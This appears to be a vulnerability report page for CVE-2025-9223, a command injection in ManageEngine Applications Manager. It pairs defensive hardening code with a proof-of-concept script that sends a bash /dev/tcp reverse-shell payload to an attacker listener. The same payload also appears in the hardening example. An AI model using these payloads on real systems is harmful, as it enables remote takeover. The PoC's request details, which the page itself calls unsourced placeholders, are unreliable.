Security Vulnerability Report
CVE-2025-9223 CVSS 8.8 HIGH

Published: 2025-11-11 14:15:36
Last Modified: 2026-04-15 00:35:42
Source (NVD sourceIdentifier): 0fc0942c-577d-436f-ae8e-945763c79b02

Description

Zohocorp ManageEngine Applications Manager versions 178100 and below are vulnerable to authenticated command injection (CWE-77) caused by improper configuration of the "execute program" action feature. An authenticated user with low privileges who can reach the action can have the Applications Manager host run attacker-chosen commands in the service's context.
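The description names the vulnerability class (CWE-77, command injection through an "execute program" action) but not the code pattern behind it. The following is an added example written for this page, not ManageEngine's implementation: it shows the generic pattern of a program path and arguments concatenated into a shell command, beside a hardened form that only accepts an absolute path under an allowlisted directory and executes an argv list with no shell at all. The directory /opt/appmanager/actions, the function names and the sample script name are assumptions; the sample payload is constructed to mirror the shape of the PoC shown later on this page.

```python
"""Added example: the injection pattern behind a CWE-77 'execute program' action
and a hardened equivalent. Illustrative Python, not ManageEngine's code; the
allowed directory, helper names and sample paths are assumptions."""
import posixpath
import re
import shlex
import subprocess
import sys

# Assumption: operators may only point the action at scripts under this directory.
ALLOWED_PROGRAM_DIR = "/opt/appmanager/actions"
# Conservative allowlist for a program path: no whitespace, no shell metacharacters.
SAFE_PATH = re.compile(r"[A-Za-z0-9_./-]+")
# Constructed payload with the same shape as the PoC on this page.
INJECTED_PROGRAM = "/bin/bash;bash -i >& /dev/tcp/10.0.0.1/4444 0>&1;"


def vulnerable_command_line(program_name, arguments):
    """'Before': the request fields are concatenated into one string that would
    later be handed to a shell (subprocess.run(cmd, shell=True) or similar).
    The ';' in program_name ends the intended command and starts the attacker's.
    Returned rather than executed so this example is safe to run."""
    return f"{program_name} {arguments}".strip()


def validate_program(program_name, allowed_dir=ALLOWED_PROGRAM_DIR):
    """'After', step 1: accept only a plain, absolute POSIX path that normalizes
    to a location inside allowed_dir. Rejects metacharacters, relative paths and
    '..' escapes. posixpath is used so the check behaves the same on any host."""
    if not SAFE_PATH.fullmatch(program_name):
        raise ValueError("program path contains disallowed characters")
    if not posixpath.isabs(program_name):
        raise ValueError("program path must be absolute")
    normalized = posixpath.normpath(program_name)
    if posixpath.commonpath([normalized, allowed_dir]) != allowed_dir:
        raise ValueError("program path is outside the allowed directory")
    return normalized


def is_allowed_program(program_name, allowed_dir=ALLOWED_PROGRAM_DIR):
    """Boolean form of validate_program for callers that prefer not to catch."""
    try:
        validate_program(program_name, allowed_dir)
        return True
    except ValueError:
        return False


def build_argv(program_name, arguments):
    """'After', step 2: build an argv list. shlex.split does POSIX word splitting
    without invoking a shell, so ';', '&' or '>' in arguments stay literal."""
    return [validate_program(program_name)] + shlex.split(arguments)


def run_action(program_name, arguments, timeout=30):
    """'After', step 3: execute the argv directly, never through a shell."""
    argv = build_argv(program_name, arguments)
    return subprocess.run(argv, shell=False, capture_output=True, text=True,
                          timeout=timeout)


def argv_keeps_metacharacters_literal(argument="a; id"):
    """Show that argv execution passes shell metacharacters through verbatim.
    Uses the running interpreter as the child so no /bin/sh is needed."""
    proc = subprocess.run(
        [sys.executable, "-c", "import sys; print(sys.argv[1])", argument],
        capture_output=True, text=True, check=True)
    return proc.stdout.rstrip("\n")


if __name__ == "__main__":
    print("vulnerable shell string:", vulnerable_command_line(INJECTED_PROGRAM, ""))
    try:
        validate_program(INJECTED_PROGRAM)
    except ValueError as err:
        print("hardened validator rejected payload:", err)
    print("argv for a legitimate action:",
          build_argv(f"{ALLOWED_PROGRAM_DIR}/restart.sh", "--service 'web 1'"))
    print("metacharacters in an argument, via argv:", argv_keeps_metacharacters_literal())
```

The two controls are independent: the allowlist stops an operator (or a low-privileged account that can edit actions) from pointing the feature at an arbitrary binary, and the argv list stops any field from being reinterpreted by a shell even if the allowlist is later loosened.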

CVSS Details

CVSS Score: 8.8
Severity: HIGH
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
Exploitability subscore: 2.8; Impact subscore: 5.9
Weakness: CWE-77 (Improper Neutralization of Special Elements used in a Command)

Reading the vector: the flaw is reachable over the network (AV:N) with low attack complexity (AC:L) and no user interaction (UI:N), but it requires an authenticated account with low privileges (PR:L), which is what keeps the score at HIGH rather than CRITICAL. Scope is unchanged (S:U), so impact is rated against the Applications Manager host itself, with full loss of confidentiality, integrity and availability (C:H/I:H/A:H), as expected for command execution in the service's context.

Configurations (Affected Products)

The NVD record carries no CPE configuration data (vulnStatus: Deferred). The affected range stated in the description is:

ManageEngine Applications Manager <= 178100

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
#!/usr/bin/env python3
"""
CVE-2025-9223 PoC - ManageEngine Applications Manager Command Injection
Authenticated command injection via execute program action feature
"""
import requests

target = "http://target:8080"
username = "low_priv_user"
password = "password123"
attacker_ip = "10.0.0.1"
attacker_port = "4444"

session = requests.Session()


def login():
    """Authenticate to Applications Manager with a low-privileged account."""
    login_url = f"{target}/j_security_check"
    data = {
        'j_username': username,
        'j_password': password
    }
    response = session.post(login_url, data=data, verify=False)
    # Weak success check: a 200 after redirects does not by itself prove the
    # login worked, since a failed login page also returns 200. Confirm with a
    # session cookie or a post-login page element before trusting this result.
    return 'Login successful' in response.text or response.status_code == 200


def exploit():
    """Send the injected program name to the execute program action."""
    # The ';' terminates the intended program path so the shell runs what follows:
    # an interactive bash reverse shell to the attacker's listener.
    payload = f";bash -i >& /dev/tcp/{attacker_ip}/{attacker_port} 0>&1;"
    # NOTE: the request path and form field names below are not documented anywhere
    # on this page; treat them as placeholders to confirm against the target build.
    exploit_url = f"{target}/executeProgram"
    headers = {
        'Content-Type': 'application/x-www-form-urlencoded',
        'X-Requested-With': 'XMLHttpRequest'
    }
    data = {
        'programName': f'/bin/bash{payload}',
        'arguments': '',
        'action': 'execute'
    }
    response = session.post(exploit_url, data=data, headers=headers, verify=False)
    # A 200 only means the request was accepted; the shell callback is the real signal.
    return response.status_code == 200


if __name__ == "__main__":
    print(f"[*] Targeting {target}")
    print("[*] Attempting authentication...")
    if login():
        print("[+] Authentication successful!")
        print("[*] Sending exploit payload...")
        if exploit():
            print("[+] Exploit sent! Check your listener for reverse shell.")
        else:
            print("[-] Exploit failed.")
    else:
        print("[-] Authentication failed.")

The request path /executeProgram, the form fields programName/arguments/action and the login success test are not sourced anywhere on this page; verify them against the target build (and against the vendor advisory linked under References) before relying on this script.

References

Vendor security update (Zohocorp ManageEngine): https://www.manageengine.com/products/applications_manager/security-updates/security-updates-cve-2025-9223.html
Raw JSON Data

JSON
{
  "cve": {
    "id": "CVE-2025-9223",
    "sourceIdentifier": "0fc0942c-577d-436f-ae8e-945763c79b02",
    "published": "2025-11-11T14:15:35.507",
    "lastModified": "2026-04-15T00:35:42.020",
    "vulnStatus": "Deferred",
    "cveTags": [],
    "descriptions": [
      {
        "lang": "en",
        "value": "Zohocorp ManageEngine Applications Manager versions 178100 and below are vulnerable to authenticated command injection vulnerability due to the improper configuration in the execute program action feature."
      }
    ],
    "metrics": {
      "cvssMetricV31": [
        {
          "source": "0fc0942c-577d-436f-ae8e-945763c79b02",
          "type": "Secondary",
          "cvssData": {
            "version": "3.1",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
            "baseScore": 8.8,
            "baseSeverity": "HIGH",
            "attackVector": "NETWORK",
            "attackComplexity": "LOW",
            "privilegesRequired": "LOW",
            "userInteraction": "NONE",
            "scope": "UNCHANGED",
            "confidentialityImpact": "HIGH",
            "integrityImpact": "HIGH",
            "availabilityImpact": "HIGH"
          },
          "exploitabilityScore": 2.8,
          "impactScore": 5.9
        }
      ]
    },
    "weaknesses": [
      {
        "source": "0fc0942c-577d-436f-ae8e-945763c79b02",
        "type": "Secondary",
        "description": [
          {
            "lang": "en",
            "value": "CWE-77"
          }
        ]
      }
    ],
    "references": [
      {
        "url": "https://www.manageengine.com/products/applications_manager/security-updates/security-updates-cve-2025-9223.html",
        "source": "0fc0942c-577d-436f-ae8e-945763c79b02"
      }
    ]
  }
}